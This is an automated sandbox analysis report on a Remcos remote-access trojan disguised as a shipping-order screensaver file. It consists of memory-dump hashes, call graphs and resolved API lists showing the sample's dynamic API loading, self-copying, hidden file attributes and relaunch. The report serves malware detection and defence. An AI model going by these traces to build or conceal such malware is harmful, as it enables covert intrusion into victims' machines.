                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction ID: ad9954620ef6471ca7d42c630a643392f512fce99149eca1b6ab5da67c4bdbf4
                                                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                      • Instruction Fuzzy Hash: 3911DF72404280CFCF0ACF54E5C4B56BF71FB88318F24C6A9D9490B256C33AD45ACBA2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042303903.00000000011CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11cd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction ID: ac965c1b97db6585881b8968518b773f27cf4bec12343a06f33a8a4bee5dd280
                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 4911BB76504280DFDB06CF54D9C4B15BFA2FB84624F24C6AED8494B296C33AD40ACBA2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bc72bf5e171e67a7c1863714e81bc0ecddc11671b01a82ed26b4c1df59be44f
                                                      • Instruction ID: 968992df521aa03c88ecb05c5005b5aa85cf3233a7ea598f097eb6123a70d8fc
                                                      • Opcode Fuzzy Hash: 2bc72bf5e171e67a7c1863714e81bc0ecddc11671b01a82ed26b4c1df59be44f
                                                      • Instruction Fuzzy Hash: EC01FC310047809AEB1C4E99DDC4BE6BF9CDF4632CF14C529EE080A246C3399400C672
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042255038.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_11bd000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef09c3ac3752da975680b6270b9a9d8f73b5eade45262aab5a8ea3f94382a299
                                                      • Instruction ID: 2b6525d404dc3547580c36517c7549087f2068143a7049a71704243174c0c84b
                                                      • Opcode Fuzzy Hash: ef09c3ac3752da975680b6270b9a9d8f73b5eade45262aab5a8ea3f94382a299
                                                      • Instruction Fuzzy Hash: 18F0C8710047449AEB158E59D8C8BA2FFD8EF42738F18C55AEE084B286C3799840CB71
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TJbq$Te]q$xb`q
                                                      • API String ID: 0-1930611328
                                                      • Opcode ID: b65faf2db1a94980aa7eeaa074b827d440b49f3e22ad07f818b51acedf7c00b0
                                                      • Instruction ID: 1ec36d056fd6494f546445c6f32afcb317c7e1827bf562ca307ffd5eeb1ebfad
                                                      • Opcode Fuzzy Hash: b65faf2db1a94980aa7eeaa074b827d440b49f3e22ad07f818b51acedf7c00b0
                                                      • Instruction Fuzzy Hash: FFC184B5E006588FDB18CF6AC9846DDBBF2BF89300F14C1AAD409AB325DB305A85CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4']q
                                                      • API String ID: 0-1259897404
                                                      • Opcode ID: 8a0825bdd16a1d2dbc969312d1660e68c1653d558509c3c079527f7e2b22f961
                                                      • Instruction ID: 6d7c699d5fb535249becc051c0055715e83da7269721bb301a11f8e1964e7e22
                                                      • Opcode Fuzzy Hash: 8a0825bdd16a1d2dbc969312d1660e68c1653d558509c3c079527f7e2b22f961
                                                      • Instruction Fuzzy Hash: 2E710771E152099FDB08DF7AE98169ABFF6FF88300F54C969D0089B269FB745806CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4']q
                                                      • API String ID: 0-1259897404
                                                      • Opcode ID: 018375f16bdcc0b3d07a866a1697c901cdcc72885f6d30c477906f90755f6a80
                                                      • Instruction ID: 562daefb1a5d51e3efc7f56f67f25e7ff5772359cf93084065d3cbbc4063bb8a
                                                      • Opcode Fuzzy Hash: 018375f16bdcc0b3d07a866a1697c901cdcc72885f6d30c477906f90755f6a80
                                                      • Instruction Fuzzy Hash: 2A610971E152099FD708EF7AE98169ABBF6FF88300F54C929D0089B368FB745806CB40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d014dd206d38908e9b06f76ddd363cec3d5006a6288984128c2b54d80cd2fb7d
                                                      • Instruction ID: 91da6e0c3622a05f069e15b4486b9a01d32f30226ea96fbafa3d377598fdd5f7
                                                      • Opcode Fuzzy Hash: d014dd206d38908e9b06f76ddd363cec3d5006a6288984128c2b54d80cd2fb7d
                                                      • Instruction Fuzzy Hash: EF12C6F8D81B458BD310CF25EA4C38A3BF1BBA5398BD04B19D2611B2E5DBB4156ACF44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6646c0ee4f9aa15a235f8940c31c98f23cc43668c1966b6d48ede4bd6a6302c4
                                                      • Instruction ID: 35e84473a8c7143b5a72b4fe91fa81109826936e261ba99704c9075b2fce5978
                                                      • Opcode Fuzzy Hash: 6646c0ee4f9aa15a235f8940c31c98f23cc43668c1966b6d48ede4bd6a6302c4
                                                      • Instruction Fuzzy Hash: 71A12B36E002058FCF06DFA5C8445EEB7B2FF85304B2585AAF805AB665DBB1E915CB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 679de141e7018375fb156c8c67a0248fa294eb52d52bf34de1c9518a8997b5b3
                                                      • Instruction ID: e177072c0de27f2a65fc507c17b138d9846aa2c00a8a6b0b2c5603041f353430
                                                      • Opcode Fuzzy Hash: 679de141e7018375fb156c8c67a0248fa294eb52d52bf34de1c9518a8997b5b3
                                                      • Instruction Fuzzy Hash: DAC15DB9C80B458FD311CF64EA4838A3BF1BFA5398F904B19D1616B2E1DBB4156ACF44

Execution Graph

Execution Coverage:1.8%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:2.1%
Total number of Nodes:669
Total number of Limit Nodes:20
104 API calls 47857->48016 47858->47367 47861 40e183 47860->47861 47862 41a65c LoadResource LockResource SizeofResource 47860->47862 47861->47586 47862->47861 47864 401f8e __common_dcos_data 47863->47864 47870 402325 47864->47870 47866 401fa4 47866->47590 47868 401f86 28 API calls 47867->47868 47869 406066 47868->47869 47869->47597 47871 40232f __common_dcos_data 47870->47871 47873 40233a 47871->47873 47874 40294a 28 API calls __common_dcos_data 47871->47874 47873->47866 47874->47873 47876 40250d __common_dcos_data 47875->47876 47877 40252b 47876->47877 47879 40261a 28 API calls 47876->47879 47877->47601 47879->47877 47880->47622 47881->47622 47882->47612 47883->47603 47884->47626 47885->47630 47886->47632 47889 402e85 __common_dcos_data 47888->47889 47890 402e98 47889->47890 47892 402ea9 47889->47892 47893 402eae 47889->47893 47895 403445 28 API calls __common_dcos_data 47890->47895 47892->47641 47893->47892 47896 40225b 11 API calls __common_dcos_data 47893->47896 47895->47892 47896->47892 47898 404bd0 47897->47898 47901 40245c 47898->47901 47900 404be4 47900->47644 47902 402469 __common_dcos_data 47901->47902 47904 402478 47902->47904 47905 402ad3 28 API calls __common_dcos_data 47902->47905 47904->47900 47905->47904 47906->47648 47907->47651 47909 401e94 __common_dcos_data 47908->47909 47911 41a471 47910->47911 47912 41b168 GetCurrentProcess 47910->47912 47913 412513 RegOpenKeyExA 47911->47913 47912->47911 47914 412541 RegQueryValueExA RegCloseKey 47913->47914 47915 412569 47913->47915 47914->47915 47916 401f66 28 API calls 47915->47916 47917 41257e 47916->47917 47917->47665 47918->47673 47920 40b02f __common_dcos_data 47919->47920 47923 40b04b 47920->47923 47922 40b045 47922->47684 47924 40b055 __common_dcos_data 47923->47924 47926 40b060 __common_dcos_data 47924->47926 47927 40b138 28 API calls __common_dcos_data 47924->47927 47926->47922 47927->47926 47928->47688 47929->47690 47931 403b48 __common_dcos_data 47930->47931 47940 403b7a 28 API calls 47931->47940 
47933 403b5a 47933->47710 47934->47702 47935->47728 47936->47727 47937->47716 47938->47720 47939->47726 47940->47933 47942 408577 __common_dcos_data 47941->47942 47984 402ca8 47942->47984 47946 4085a3 47946->47760 47948 40bba1 47947->47948 47949 40bbdd 47947->47949 48002 40b0dd 47948->48002 47951 40bc1e 47949->47951 47954 40b0dd 28 API calls 47949->47954 47953 40bc5f 47951->47953 47956 40b0dd 28 API calls 47951->47956 47953->47780 47953->47781 47957 40bbf4 47954->47957 47955 4028cf 28 API calls 47958 40bbbd 47955->47958 47959 40bc35 47956->47959 47960 4028cf 28 API calls 47957->47960 47962 412774 14 API calls 47958->47962 47963 4028cf 28 API calls 47959->47963 47961 40bbfe 47960->47961 47964 412774 14 API calls 47961->47964 47965 40bbd1 47962->47965 47966 40bc3f 47963->47966 47967 40bc12 47964->47967 47968 401e13 11 API calls 47965->47968 47969 412774 14 API calls 47966->47969 47970 401e13 11 API calls 47967->47970 47968->47949 47971 40bc53 47969->47971 47970->47951 47972 401e13 11 API calls 47971->47972 47972->47953 47974 401e0c __common_dcos_data 47973->47974 48008 402d8b 47975->48008 47977 4028dd 47977->47763 47979 4127c6 47978->47979 47981 412789 47978->47981 47980 401e13 11 API calls 47979->47980 47982 40be89 47980->47982 47983 4127a2 RegSetValueExW RegCloseKey 47981->47983 47982->47814 47983->47979 47985 402cb5 __common_dcos_data 47984->47985 47986 402cc8 47985->47986 47988 402cd9 47985->47988 47989 402cde 47985->47989 47995 403374 28 API calls __common_dcos_data 47986->47995 47991 402de3 47988->47991 47989->47988 47996 402f21 11 API calls __common_dcos_data 47989->47996 47992 402daf __common_dcos_data 47991->47992 47997 4030f7 47992->47997 47994 402dcd 47994->47946 47995->47988 47996->47988 47998 403101 __common_dcos_data 47997->47998 48000 403115 __common_dcos_data 47998->48000 48001 4036c2 28 API calls __common_dcos_data 47998->48001 48000->47994 48001->48000 48003 40b0e9 __common_dcos_data 48002->48003 48004 402ca8 28 API calls 48003->48004 48005 40b10c 
48004->48005 48006 402de3 28 API calls 48005->48006 48007 40b11f 48006->48007 48007->47955 48009 402d97 48008->48009 48010 4030f7 28 API calls 48009->48010 48011 402dab 48010->48011 48011->47977 48013 40230d 48012->48013 48014 402325 28 API calls 48013->48014 48015 401f80 48014->48015 48015->47426 48024 411637 62 API calls 48023->48024

                                                      Control-flow Graph

                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                      • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleLibraryLoadModule
                                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                      • API String ID: 384173800-625181639
                                                      • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                      • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                      • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                      • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                        • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                        • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                        • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000104), ref: 0040D790
                                                        • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                      • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                      • API String ID: 2830904901-2121370267
                                                      • Opcode ID: 1484b2f7a7f91c3ee938c637a9a7dae7839d2338987acae383d1c6a0cb17adc1
                                                      • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                      • Opcode Fuzzy Hash: 1484b2f7a7f91c3ee938c637a9a7dae7839d2338987acae383d1c6a0cb17adc1
                                                      • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                      Control-flow Graph

                                                      APIs
                                                      • _wcslen.LIBCMT ref: 0040BC75
                                                      • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                      • CopyFileW.KERNELBASE(C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                      • _wcslen.LIBCMT ref: 0040BD54
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe,00000000,00000000), ref: 0040BDF2
                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                      • _wcslen.LIBCMT ref: 0040BE34
                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                      • ExitProcess.KERNEL32 ref: 0040BED0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                      • String ID: 6$C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$del$open$BG$BG
                                                      • API String ID: 1579085052-1346731980
                                                      • Opcode ID: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                      • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                      • Opcode Fuzzy Hash: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                      • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE

                                                      Control-flow Graph

                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LongNamePath
                                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                      • API String ID: 82841172-425784914
                                                      • Opcode ID: c2d06ea8c2a66cf5c705706c372c41cf9f81b2c3d5dea1c7eec24b750922d7eb
                                                      • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                      • Opcode Fuzzy Hash: c2d06ea8c2a66cf5c705706c372c41cf9f81b2c3d5dea1c7eec24b750922d7eb
                                                      • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                        • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                        • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                        • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                      • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCurrentOpenProcessQueryValue
                                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
